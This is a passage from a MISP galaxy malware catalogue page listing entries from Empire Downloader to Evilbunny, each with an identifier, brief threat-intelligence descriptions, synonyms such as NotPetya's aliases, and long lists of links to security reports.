- https://www.wiwo.de/my/technologie/digitale-welt/emotet-netzwerk-wie-eines-der-groessten-hacker-netzwerke-der-welt-lahmgelegt-wurde/27164048.html - webarchive
- https://www.netskope.com/blog/emotet-still-abusing-microsoft-office-macros - webarchive
- https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf - webarchive
- https://blog.nviso.eu/2022/03/23/hunting-emotet-campaigns-with-kusto/ - webarchive
- https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/ - webarchive
- https://www.hornetsecurity.com/en/threat-research/emotet-botnet-takedown/ - webarchive
- https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/ - webarchive
- https://www.youtube.com/watch?v=_BLOmClsSpc - webarchive
- https://isc.sans.edu/diary/rss/28254 - webarchive
- https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2 - webarchive
- https://github.com/mauronz/binja-emotet - webarchive
- https://www.ironnet.com/blog/detecting-a-mummyspider-campaign-and-emotet-infection - webarchive
- https://www.bleepingcomputer.com/news/security/emotet-malware-hits-lithuanias-national-public-health-center/ - webarchive
- https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf - webarchive
- https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html - webarchive
- https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html - webarchive
- https://medium.com/@Ilandu/emotet-unpacking-35bbe2980cfb - webarchive
- https://www.cronup.com/la-botnet-de-emotet-reinicia-ataques-en-chile-y-latinoamerica/ - webarchive
- https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/ - webarchive
- https://forensicitguy.github.io/shortcut-to-emotet-ttp-change/ - webarchive
- https://d00rt.github.io/emotet_network_protocol/ - webarchive
- https://www.hornetsecurity.com/en/security-informationen-en/webshells-powering-emotet/ - webarchive
- https://estr3llas.github.io/unpacking-an-emotet-trojan/ - webarchive
- https://www.zscaler.com/blogs/security-research/return-emotet-malware-analysis - webarchive
- https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much - webarchive
- https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service - webarchive
- https://blogs.blackberry.com/en/2023/01/emotet-returns-with-new-methods-of-evasion - webarchive
- https://www.welivesecurity.com/2023/07/06/whats-up-with-emotet/ - webarchive
- https://securelist.com/emotet-modules-and-recent-attacks/106290/ - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://forensicitguy.github.io/emotet-excel4-macro-analysis/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/emotet-makes-timely-adoption-political-and-elections-lures - webarchive
- https://isc.sans.edu/forums/diary/Emotet+Stops+Using+0000+in+Spambot+Traffic/28270/ - webarchive
- https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc - webarchive
- https://unit42.paloaltonetworks.com/domain-parking/ - webarchive
- https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903 - webarchive
- https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html - webarchive
- https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf - webarchive
- https://blogs.vmware.com/security/2022/03/emotet-c2-configuration-extraction-and-analysis.html - webarchive
- https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/ - webarchive
- https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Empire Downloader
Internal MISP references
UUID aa445513-9616-4f61-a72d-7aff4a10572b
which can be used as unique global reference for Empire Downloader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader - webarchive
- https://jsac.jpcert.or.jp/archive/2024/pdf/JSAC2024_1_9_takeda_furukawa_en.pdf - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf - webarchive
- https://twitter.com/thor_scanner/status/992036762515050496 - webarchive
- https://www.mandiant.com/media/12596/download - webarchive
- https://lab52.io/blog/wirte-group-attacking-the-middle-east/ - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-drake - webarchive
- https://attack.mitre.org/groups/G0096 - webarchive
- https://redcanary.com/blog/getsystem-offsec/ - webarchive
- https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf - webarchive
- https://paper.seebug.org/1301/ - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
- https://unit42.paloaltonetworks.com/atoms/obscureserpens/ - webarchive
- https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/looking-over-the-nation-state-actors-shoulders.html - webarchive
- https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/ - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-heron - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-firestone - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-249a - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-009.pdf - webarchive
- https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-atlas - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-275a - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-heron - webarchive
- https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/ - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-burlap - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-ulrick - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Emudbot
Supposedly a worm that was active around 2012-2013.
Internal MISP references
UUID d3189268-443b-42f6-99a2-12d29f309c0b
which can be used as unique global reference for Emudbot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Enfal
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Enfal.
Known Synonyms |
---|
Lurid |
Internal MISP references
UUID 2a4cacb7-80a1-417e-8b9c-54b4089f35d9
which can be used as unique global reference for Enfal
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal - webarchive
- https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-palace - webarchive
- https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/ - webarchive
- https://attack.mitre.org/groups/G0011 - webarchive
- https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf - webarchive
- https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/ - webarchive
- https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-union - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Enigma Loader
According to Trend Micro, this is a downloader dedicated to staging the execution of a second-stage malware called Enigma Stealer.
Internal MISP references
UUID 7491f483-f3d2-4f90-be19-df1e3783f66f
which can be used as unique global reference for Enigma Loader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Entropy
Entropy is a ransomware first seen in the 1st quarter of 2022 and is being used in conjunction with Dridex infections. The ransomware packs itself with a custom packer that has also been seen in some early Dridex samples.
Internal MISP references
UUID 8dc64857-abb1-4926-8114-052f9ba4bc33
which can be used as unique global reference for Entropy
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.entropy - webarchive
- https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/ - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://killingthebear.jorgetesta.tech/actors/evil-corp - webarchive
- https://lka.polizei.nrw/presse/schlag-gegen-international-agierendes-netzwerk-von-cyber-kriminellen - webarchive
- https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/?cmp=30728 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EntryShell
EntryShell is a fileless malware, considered a variant of the KeyBoy malware due to similarities in backdoor command IDs and debug messages with old KeyBoy samples. The embedded malware config was encrypted with a unique algorithm.
Internal MISP references
UUID 73a0919b-1c81-4af5-a6d1-8fb5ae951269
which can be used as unique global reference for EntryShell
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Enviserv
According to Microsoft, Enviserv is a malicious program that is unable to spread of its own accord. It may perform a number of actions of an attacker's choice on an affected computer.
Internal MISP references
UUID 58071588-708d-447d-9fb4-8c9268142c82
which can be used as unique global reference for Enviserv
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EnvyScout
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular EnvyScout.
Known Synonyms |
---|
ROOTSAW |
Internal MISP references
UUID 0890e245-319d-4291-8f49-21dbc9486181
which can be used as unique global reference for EnvyScout
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.envyscout - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-0503.pdf - webarchive
- https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58 - webarchive
- https://blogs.blackberry.com/en/2023/03/nobelium-targets-eu-governments-assisting-ukraine - webarchive
- https://cert.pl/posts/2023/04/kampania-szpiegowska-apt29/ - webarchive
- https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing - webarchive
- https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/ - webarchive
- https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf - webarchive
- https://www.incibe.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf - webarchive
- https://blog.bushidotoken.net/2022/06/overview-of-russian-gru-and-svr.html - webarchive
- https://www.sekoia.io/en/nobeliums-envyscout-infection-chain-goes-in-the-registry-targeting-embassies/ - webarchive
- https://cert-agid.gov.it/news/il-malware-envyscout-apt29-e-stato-veicolato-anche-in-italia/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Epsilon Red
According to PCrisk, Epsilon is a ransomware-type program. This malware is designed to encrypt the data of infected systems in order to demand payment for decryption.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Epsilon Red.
Known Synonyms |
---|
BlackCocaine |
Internal MISP references
UUID d6d0bf38-c85c-41d3-bc0e-3477b458563e
which can be used as unique global reference for Epsilon Red
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.epsilon_red - webarchive
- https://cybleinc.com/2021/06/03/nucleus-software-becomes-victim-of-the-blackcocaine-ransomware/ - webarchive
- https://news.sophos.com/en-us/2021/05/28/epsilonred/ - webarchive
- https://therecord.media/epsilonred-ransomware-group-hits-one-of-indias-financial-software-powerhouses/ - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Epsilon Stealer
Epsilon Stealer is an information stealer sold as Malware as a Service by a new French actor called "Epsilon". This malware is distributed as a game, mainly on Discord, but steals user credentials, crypto wallets, and stored cookies. It evades static detection by being packed with NSIS, which then launches a malicious Electron package.
Internal MISP references
UUID c9babd08-0db1-4004-8664-d1be08cf1db6
which can be used as unique global reference for Epsilon Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EquationDrug
Internal MISP references
UUID c4490972-3403-4043-9d61-899c0a440940
which can be used as unique global reference for EquationDrug
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.equationdrug - webarchive
- https://securelist.com/inside-the-equationdrug-espionage-platform/69203/ - webarchive
- http://artemonsecurity.blogspot.com/2017/03/equationdrug-rootkit-analysis-mstcp32sys.html - webarchive
- https://mp.weixin.qq.com/s/3ZQhn32NB6p-LwndB2o2zQ - webarchive
- https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Equationgroup (Sorting)
Rough collection of EQGRP samples, to be sorted.
Internal MISP references
UUID 35c1abaf-8dee-48fe-8329-f6e5612eb7af
which can be used as unique global reference for Equationgroup (Sorting)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.equationgroup - webarchive
- https://laanwj.github.io/2016/09/17/seconddate-cnc.html - webarchive
- https://laanwj.github.io/2016/09/23/seconddate-adventures.html - webarchive
- https://laanwj.github.io/2016/09/09/blatsting-lp-transcript.html - webarchive
- https://laanwj.github.io/2016/09/01/tadaqueos.html - webarchive
- https://research.checkpoint.com/2021/a-deep-dive-into-doublefeature-equation-groups-post-exploitation-dashboard/ - webarchive
- https://laanwj.github.io/2016/08/28/feintcloud.html - webarchive
- https://laanwj.github.io/2016/09/11/buzzdirection.html - webarchive
- https://laanwj.github.io/2016/09/04/blatsting-command-and-control.html - webarchive
- https://laanwj.github.io/2016/08/22/blatsting.html - webarchive
- https://laanwj.github.io/2016/09/13/blatsting-rsa.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Erbium Stealer
Erbium is an information stealer advertised and sold as a Malware-as-a-Service on cybercrime forums and Telegram since at least July 2022. Its capabilities are those of a classic information stealer, with a focus on cryptocurrency wallets, and file grabber capabilities.
Internal MISP references
UUID b566fe1f-7ed7-4932-b04d-355facdeab7a
which can be used as unique global reference for Erbium Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.erbium_stealer - webarchive
- https://twitter.com/sekoia_io/status/1577222282929311744 - webarchive
- https://blog.cluster25.duskrise.com/2022/09/15/erbium-stealer-a-new-infostealer - webarchive
- https://twitter.com/abuse_ch/status/1565290110572175361 - webarchive
- https://www.bleepingcomputer.com/news/security/new-erbium-password-stealing-malware-spreads-as-game-cracks-cheats/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Erebus (Windows)
Internal MISP references
UUID 06450729-fe60-4348-9717-c13a487738b9
which can be used as unique global reference for Erebus (Windows)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Eredel
Eredel Stealer is a low-priced malware that extracts passwords, cookies and desktop screenshots from browsers and programs.
According to nulled[.]to:
Supported browsers (Chromium-based): Chromium, Google Chrome, Kometa, Amigo, Torch, Orbitum, Opera, Opera Neon, Comodo Dragon, Nichrome (Rambler), Yandex Browser, Maxthon5, Sputnik, Epic Privacy Browser, Vivaldi, CocCoc and other Chromium-based browsers.
- Stealing FileZilla
- Stealing an account from Telegram
- Stealing AutoFill
- Theft of wallets: Bitcoin | Dash | Monero | Electrum | Ethereum | Litecoin
- Stealing files from the desktop. Supports any format, configurable via Telegram bot
Internal MISP references
UUID acd2555d-b4a1-47b4-983a-fb7b3a402dab
which can be used as unique global reference for Eredel
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.eredel - webarchive
- https://webcache.googleusercontent.com/search?q=cache:3hU62-Lr2t8J:https://www.nulled.to/topic/486274-eredel-stealer-lite-private-having-control-via-the-web-panel-multifunctional-stealer/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-ab - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Erica Ransomware
Internal MISP references
UUID 0f4731b3-b661-4677-9e51-474504313202
which can be used as unique global reference for Erica Ransomware
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Eris
Ransomware.
Internal MISP references
UUID c4531af6-ab25-4266-af41-e01635a93abe
which can be used as unique global reference for Eris
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ESPecter
Internal MISP references
UUID 3e89d4e6-f7bd-44fd-ade9-c3d408ce67fb
which can be used as unique global reference for ESPecter
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.especter - webarchive
- https://www.binarly.io/posts/Design_issues_of_modern_EDR%E2%80%99s_bypassing_ETW-based_solutions/index.html - webarchive
- https://www.welivesecurity.com/2021/10/05/uefi-threats-moving-esp-introducing-especter-bootkit/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EternalRocks
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular EternalRocks.
Known Synonyms |
---|
MicroBotMassiveNet |
Internal MISP references
UUID 10dd9c6a-9baa-40b6-984a-0598c4d9a88f
which can be used as unique global reference for EternalRocks
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EternalPetya
According to Proofpoint, Bad Rabbit is a strain of ransomware that first appeared in 2017 and is a suspected variant of Petya. Like other strains of ransomware, Bad Rabbit infections lock up victims' computers, servers, or files, preventing them from regaining access until a ransom (usually in Bitcoin) is paid.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular EternalPetya.
Known Synonyms |
---|
BadRabbit |
Diskcoder.C |
ExPetr |
NonPetya |
NotPetya |
Nyetya |
Petna |
Pnyetya |
nPetya |
Internal MISP references
UUID 6f736038-4f74-435b-8904-6870ee0e23ba
which can be used as unique global reference for EternalPetya
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya - webarchive
- https://securelist.com/from-blackenergy-to-expetr/78937/ - webarchive
- https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors - webarchive
- https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/ - webarchive
- https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/ - webarchive
- https://securelist.com/in-expetrpetyas-shadow-fakecry-ransomware-wave-hits-ukraine/78973/ - webarchive
- https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/ - webarchive
- https://therecord.media/mondelez-and-zurich-reach-settlement-in-notpetya-cyberattack-insurance-suit/ - webarchive
- https://www.youtube.com/watch?v=mrTdSdMMgnk - webarchive
- https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b - webarchive
- https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4 - webarchive
- https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/ - webarchive
- https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/ - webarchive
- https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/ - webarchive
- https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf - webarchive
- https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/ - webarchive
- https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/ - webarchive
- https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/ - webarchive
- https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer - webarchive
- https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf - webarchive
- http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html - webarchive
- https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat - webarchive
- https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too - webarchive
- https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/ - webarchive
- https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/ - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
- https://istari-global.com/spotlight/the-untold-story-of-notpetya/ - webarchive
- https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html - webarchive
- https://www.atlanticcouncil.org/content-series/tech-at-the-leading-edge/the-russian-cyber-unit-that-hacks-targets-on-site/ - webarchive
- https://attack.mitre.org/groups/G0034 - webarchive
- https://www.welivesecurity.com/2017/06/27/new-ransomware-attack-hits-ukraine - webarchive
- https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html - webarchive
- https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-yet-another-stolen-piece-package/ - webarchive
- https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf - webarchive
- https://services.google.com/fh/files/misc/apt44-unearthing-sandworm.pdf - webarchive
- https://www.cyberscoop.com/russian-hackers-notpetya-charges-gru/ - webarchive
- https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/ - webarchive
- https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware - webarchive
- https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games - webarchive
- https://blog.talosintelligence.com/2022/02/current-executive-guidance-for-ongoing.html - webarchive
- https://aguinet.github.io//blog/2020/08/29/miasm-bootloader.html - webarchive
- https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html - webarchive
- https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik - webarchive
- https://securelist.com/big-threats-using-code-similarity-part-1/97239/ - webarchive
- https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna - webarchive
- https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks - webarchive
- https://gvnshtn.com/maersk-me-notpetya/ - webarchive
- https://medium.com/@Ilandu/petya-not-petya-ransomware-9619cbbb0786 - webarchive
- https://securelist.com/apt-trends-report-q2-2019/91897/ - webarchive
- https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/ - webarchive
- http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html - webarchive
- https://www.riskiq.com/blog/labs/badrabbit/ - webarchive
- https://securelist.com/bad-rabbit-ransomware/82851/ - webarchive
- https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/ - webarchive
- https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/ - webarchive
- https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back - webarchive
- https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/ - webarchive
- https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/ - webarchive
- https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/ - webarchive
- https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/ - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-viking - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-110a - webarchive
- http://blog.talosintelligence.com/2017/10/bad-rabbit.html - webarchive
- https://securelist.com/schroedingers-petya/78870/ - webarchive
- https://marcoramilli.com/2022/03/01/diskkill-hermeticwiper-and-notpetya-dissimilarities/ - webarchive
- https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/ - webarchive
- https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/ - webarchive
- http://www.intezer.com/notpetya-returns-bad-rabbit/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Eternity Clipper
This malware is part of the Eternity Malware "Framework".
Internal MISP references
UUID 283928b7-2820-4230-a012-59302febff90
which can be used as unique global reference for Eternity Clipper
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.eternity_clipper - webarchive
- https://www.zscaler.com/blogs/security-research/analysis-lilithbot-malware-and-eternity-threat-group - webarchive
- https://www.bleepingcomputer.com/news/security/eternity-malware-kit-offers-stealer-miner-worm-ransomware-tools/ - webarchive
- https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Eternity Ransomware
Eternity Framework Ransomware Payload
Internal MISP references
UUID 0554d721-71d7-49ff-965c-1512427b303e
which can be used as unique global reference for Eternity Ransomware
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.eternity_ransomware - webarchive
- https://www.bleepingcomputer.com/news/security/eternity-malware-kit-offers-stealer-miner-worm-ransomware-tools/ - webarchive
- https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/ - webarchive
- https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Eternity Stealer
This stealer is part of the Eternity malware project.
Internal MISP references
UUID 94bf44d8-3eb3-42b0-b906-102f2b8548f5
which can be used as unique global reference for Eternity Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.eternity_stealer - webarchive
- https://blog.sekoia.io/eternityteam-a-new-prominent-threat-group-on-underground-forums/ - webarchive
- https://securityintelligence.com/news/eternity-gang-ransomware-as-a-service-telegram/ - webarchive
- https://www.zscaler.com/blogs/security-research/analysis-lilithbot-malware-and-eternity-threat-group - webarchive
- https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/ - webarchive
- https://blog.morphisec.com/nft-malware-new-evasion-abilities - webarchive
- https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/ - webarchive
- https://blogs.blackberry.com/en/2022/06/threat-spotlight-eternity-project-maas-goes-on-and-on - webarchive
- https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ - webarchive
- https://twitter.com/3xp0rtblog/status/1509601846494695438 - webarchive
- https://ke-la.com/information-stealers-a-new-landscape/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Eternity Worm
This malware is part of the Eternity Malware "Framework".
Internal MISP references
UUID 9bdffa86-2bed-4d9d-8697-5d70e62015dc
which can be used as unique global reference for Eternity Worm
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.eternity_worm - webarchive
- https://www.bleepingcomputer.com/news/security/eternity-malware-kit-offers-stealer-miner-worm-ransomware-tools/ - webarchive
- https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/ - webarchive
- https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EtumBot
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular EtumBot.
Known Synonyms |
---|
HighTide |
Internal MISP references
UUID 91af1080-6378-4a90-ba1e-78634cd31efe
which can be used as unique global reference for EtumBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot - webarchive
- https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-globe - webarchive
- https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Evilbunny
Internal MISP references
UUID dc39dcdf-50e7-4d55-94a0-926853f344f3
which can be used as unique global reference for Evilbunny
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny - webarchive
- https://web.archive.org/web/20150310155151/http://blog.9bplus.com/analyzing-cve-2011-4369-part-one/ - webarchive
- https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope - webarchive
